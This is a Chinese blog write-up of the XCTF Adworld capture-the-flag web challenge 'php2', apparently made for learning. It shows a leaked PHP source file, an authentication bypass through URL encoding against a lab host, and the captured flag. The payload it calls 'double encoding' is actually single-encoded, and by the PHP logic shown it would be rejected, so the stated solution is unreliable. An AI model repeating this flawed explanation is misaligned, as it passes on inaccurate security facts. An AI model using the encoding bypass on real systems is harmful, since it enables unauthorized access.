【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)

2021-12-27 08:13:50 浏览数 (1)

文章目录

  • 一、php2
  • 二、使用步骤
    • 1.点击获取在线场景
    • 2.进入页面
  • 总结

一、php2

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.进入页面

index.php

输入地址

代码语言:javascript复制
http://111.200.241.244:55773/index.phps

得到

代码语言:javascript复制
<?php
if("admin"===$_GET[id]) {
  echo("not allowed!");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "Access granted!";
  echo "Key: xxxxxxx ";
}
?>

Can you anthenticate to this website?

代码审计,可以看出,get接受id=admin

查看不被允许 进行admin二次编码:%61%64%6d%69%6e 这是url二次编码

代码语言:javascript复制
http://111.200.241.244:55773/index.php?id=%61%64%6d%69%6e

得到flag:cyberpeace{67cbbc9953933686d0d29409017fa15c}


总结

  • 源码审计
  • 二次编码

0 人点赞